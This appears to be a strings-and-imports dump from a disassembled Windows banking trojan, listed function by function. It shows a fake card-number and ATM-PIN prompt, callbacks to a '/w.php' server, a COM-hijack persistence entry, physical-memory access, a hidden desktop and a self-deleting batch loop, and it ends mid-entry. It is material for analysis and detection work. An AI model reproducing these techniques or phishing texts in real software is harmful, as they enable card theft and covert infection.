sub_outside():
KERNEL32.GlobalFindAtomA
KERNEL32.GlobalDeleteAtom
|
sub_405AAC(033b):
KERNEL32.GetTickCount
KERNEL32.DeleteFileA
KERNEL32.CreateFileA
KERNEL32.GetFileSize
KERNEL32.CloseHandle
KERNEL32.GetSystemDirectoryA
KERNEL32.GetWindowsDirectoryA
KERNEL32.WinExec
KERNEL32.LocalFree
"C:\\WINDOWS\\System32"
"%s\\%s.dat"
"http://%s"
"/"
"/w.php"
"ifc"
"Software\\Microsoft\\Windows"
"?ifc=%u"
"q"
"KKQHOOK"
"ifc"
"Software\\Microsoft\\Windows"
"wpst "
"ofstkkq"
"Software\\Microsoft\\Windows"
"q"
"KKQHOOK"
"ofstkkq"
"Software\\Microsoft\\Windows"
"ofstkkqc"
"Software\\Microsoft\\Windows"
"C:\\WINDOWS\\System32"
"%s\\%s.tmp"
"q"
"KKQHOOK"
"ofstkkqc"
"Software\\Microsoft\\Windows"
"?dmp=2"
"q"
"KKQHOOK"
":%02u"
"%s\\cmd.pif"
"\\cmd.exe"
"%s\\command.pif"
"\\command.com"
"%s /C %s"
"wupd "
"C:\\WINDOWS\\System32"
"%s\\%s.dat"
"q"
"xd2"
"newver"
|
sub_404117(05e9):
KERNEL32.lstrlenW
KERNEL32.WideCharToMultiByte
|
sub_40251A(0c86):
KERNEL32.GlobalFindAtomA
KERNEL32.GlobalDeleteAtom
":F"
|
sub_402AAB(1307):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
|
sub_4054DD(1787):
USER32.GetWindow
USER32.GetClassNameA
|
sub_404FCE(1b1a):
KERNEL32.CreateFileA
KERNEL32.SetFilePointer
KERNEL32.WriteFile
KERNEL32.CloseHandle
"\r\n"
|
sub_401A00(2155):
ADVAPI32.GetSecurityInfo
ADVAPI32.SetEntriesInAclA
ADVAPI32.SetSecurityInfo
KERNEL32.CloseHandle
"\\device\\physicalmemory"
"CURRENT_USER"
|
sub_40530C(2405):
KERNEL32.VirtualAlloc
|
sub_4014E2(24c3):
KERNEL32.CreateFileA
KERNEL32.GetFileSize
KERNEL32.LocalAlloc
KERNEL32.ReadFile
KERNEL32.CloseHandle
|
sub_403659(2c36):
KERNEL32.LocalFree
KERNEL32.lstrlen
KERNEL32.LocalAlloc
KERNEL32.GetTempPathA
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.CloseHandle
".htm"
""
""
"%s%u"
""
""
"f%.3u"
""
""
""
""
|
sub_40523F(3e50):
KERNEL32.GetVersion
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.CloseHandle
KERNEL32.GetSystemDirectoryA
KERNEL32.DeleteFileA
KERNEL32.WinExec
"c:\\boot.sys"
"%s\\cmd.pif"
"\\cmd.exe /C start c:\\boot.sys"
|
sub_404F53(3f2c):
KERNEL32.CreateThread
KERNEL32.CloseHandle
|
sub_405350(3f78):
NTDLL.RtlZeroMemory
|
sub_4026EE(4366):
KERNEL32.GetSystemDirectoryA
KERNEL32.GetVolumeInformationA
"%08X"
|
sub_401326(4a10):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
|
sub_402D21(5902):
"/* "
"%s%c"
" */"
"var %c%c%c = %u;"
"//%c%c%c\r\n"
"\r\n"
|
sub_4024E0(59bc):
KERNEL32.GlobalAddAtomA
":F"
|
sub_40553F(5a7a):
USER32.ShowWindow
USER32.GetWindowRect
USER32.CreateWindowExA
GDI32.CreateFontA
USER32.SendMessageA
USER32.GetWindowLongA
USER32.SetWindowLongA
USER32.SetFocus
"DocObject"
"Explorer"
"KKQHOOK"
"\n Authorization Failed."
"STATIC"
"STATIC"
"COMBOBOX"
"COMBOBOX"
"%.2u"
"20%.2u"
"Your card number"
"STATIC"
"Expiration date"
"STATIC"
"ATM PIN-Code"
"STATIC"
"Unable to authorize. ATM PIN-Code is re"...
"STATIC"
"Please make corrections and try again."
"STATIC"
"EDIT"
"EDIT"
"Click Once To Continue"
"BUTTON"
|
sub_404184(5b96):
"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
|
sub_40129C(5c76):
KERNEL32.CreateFileA
KERNEL32.ReadFile
KERNEL32.CloseHandle
|
sub_401565(5d48):
KERNEL32.lstrlen
|
sub_403459(69bd):
KERNEL32.CreateFileA
KERNEL32.SetFilePointer
KERNEL32.WriteFile
KERNEL32.CloseHandle
|
sub_40519A(6af3):
KERNEL32.GetSystemDirectoryA
KERNEL32.CreateFileA
KERNEL32.GetFileTime
KERNEL32.SetFileTime
KERNEL32.CloseHandle
"\\kernel32.dll"
|
sub_40107A(6c44):
NTDLL.RtlUnwind
|
sub_403BC5(7c83):
KERNEL32.GetVersion
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"1601"
"1601"
"SOFTWARE\\Policies\\Microsoft\\Windows\\Cur"...
"1601"
"1601"
"yes"
"BrowseNewProcess"
".DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Cur"...
"%s\\Software\\Microsoft\\Internet Explorer"...
"iexplore.exe"
"GlobalUserOffline"
"Software\\Microsoft\\Windows\\CurrentVersi"...
"AppEvents\\Schemes\\Apps\\Explorer\\Navigat"...
"AppEvents\\Schemes\\Apps\\Explorer\\Activat"...
|
sub_406316(8045):
KERNEL32.OpenMutexA
KERNEL32.CloseHandle
"KKQHOOK_28"
|
sub_40409C(8306):
KERNEL32.LocalFree
KERNEL32.DeleteFileA
KERNEL32.TerminateProcess
KERNEL32.CloseHandle
|
sub_402638(834b):
KERNEL32.GlobalAddAtomA
"#P0"
|
sub_40284A(84d7):
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.CloseHandle
"{%04X%04X-%04X-%04X-%04X-%04X%04X%04X}"
"C:\\WINDOWS\\System32"
"%s\\%s.dll"
"CLSID\\%s\\InProcServer32"
"Apartment"
"ThreadingModel"
"Software\\Microsoft\\Windows\\CurrentVersi"...
|
sub_402D13(898f):
"blind_user"
|
sub_403D8E(8aec):
KERNEL32.InterlockedIncrement
KERNEL32.LocalFree
KERNEL32.ExpandEnvironmentStringsA
KERNEL32.CreateProcessA
KERNEL32.CloseHandle
USER32.FindWindowA
KERNEL32.Sleep
USER32.GetWindowTextA
KERNEL32.CopyFileA
KERNEL32.DeleteFileA
KERNEL32.lstrlen
"Path"
"Software\\Microsoft\\IE Setup\\Setup"
"\\Iexplore.exe "
"%s%u - Microsoft Internet Explorer"
"IEFrame"
"X-okRecv11"
" "
"%s%c"
"%s%c"
"%s%c"
"
"
""
""
""
""
""
""
""
""
""
"\r\n"
|
sub_4032E2(920d):
ADVAPI32.GetSidIdentifierAuthority
ADVAPI32.GetSidSubAuthorityCount
USER32.wsprintfA
ADVAPI32.GetSidSubAuthority
"S-%lu-"
"0x%02hx%02hx%02hx%02hx%02hx%02hx"
"%lu"
"-%lu"
|
sub_401EAF(9730):
KERNEL32.GetVersion
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
KERNEL32.IsBadReadPtr
KERNEL32.GlobalMemoryStatus
KERNEL32.CloseHandle
KERNEL32.GetModuleHandleA
NTDLL.RtlZeroMemory
KERNEL32.VirtualQuery
KERNEL32.IsBadWritePtr
"kernel32.dll"
|
sub_4019A1(9d47):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
"ntdll.dll"
"RtlInitUnicodeString"
"NtUnmapViewOfSection"
"NtMapViewOfSection"
"RtlNtStatusToDosError"
|
sub_4034AD(a442):
WININET.FindFirstUrlCacheEntryA
WININET.FindNextUrlCacheEntryA
"?"
"*.*"
|
sub_4067EE(a840):
USER32.SetFocus
USER32.CallWindowProcA
|
sub_404BA0(a9e0):
" %X:"
":"
" "
".google."
".google.adware"
|
sub_40479E(acb5):
"|"
|
sub_4033E8(b268):
KERNEL32.GetCurrentProcessId
KERNEL32.OpenProcess
ADVAPI32.OpenProcessToken
KERNEL32.CloseHandle
KERNEL32.LocalAlloc
ADVAPI32.GetTokenInformation
KERNEL32.LocalFree
|
sub_402613(b558):
KERNEL32.GlobalAddAtomA
|
sub_401379(b976):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
|
sub_4043B0(bd79):
USER32.GetForegroundWindow
"value"
"name"
|
sub_404211(bdd4):
USER32.GetWindowTextA
"Microsoft Internet Explorer"
|
sub_402CB2(cedc):
KERNEL32.GetCurrentThreadId
USER32.GetThreadDesktop
USER32.CreateDesktopA
USER32.SetThreadDesktop
"blind_user"
|
sub_401B3E(d6a3):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.GetCurrentProcessId
|
sub_4035B2(dfca):
KERNEL32.lstrlen
KERNEL32.LocalAlloc
"%s%c%c"
|
sub_405322(e092):
KERNEL32.VirtualFree
|
sub_4068A8(e0aa):
USER32.GetWindowRect
USER32.MoveWindow
USER32.PostQuitMessage
USER32.DestroyWindow
GDI32.SetTextColor
GDI32.SetBkColor
GDI32.CreateBrushIndirect
USER32.GetWindowTextA
USER32.MessageBoxA
USER32.SetFocus
KERNEL32.CreateFileA
KERNEL32.SetFilePointer
KERNEL32.WriteFile
KERNEL32.CloseHandle
USER32.ShowWindow
USER32.DefWindowProcA
"DocObject"
"Explorer"
"%s"
"Please, select Expiration Month"
"%s %s"
"Please, select Expiration Year"
"%s-%s"
"Unable to authorize"
"Unable to authorize - INCORRECT PIN. Pl"...
"%s %s"
"\r\n"
|
sub_402B0D(e378):
KERNEL32.GetModuleFileNameA
KERNEL32.GetVersionExA
KERNEL32.GetSystemDirectoryA
KERNEL32.GetWindowsDirectoryA
KERNEL32.DeleteFileA
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.CloseHandle
KERNEL32.WinExec
"%s\\cmd.pif"
"\\cmd.exe"
"%s\\command.pif"
"\\command.com"
":loop\r\n@del %s>nul\r\n@if exist %s goto l"...
"%s /C %s"
|
sub_402F2F(e79e):
" |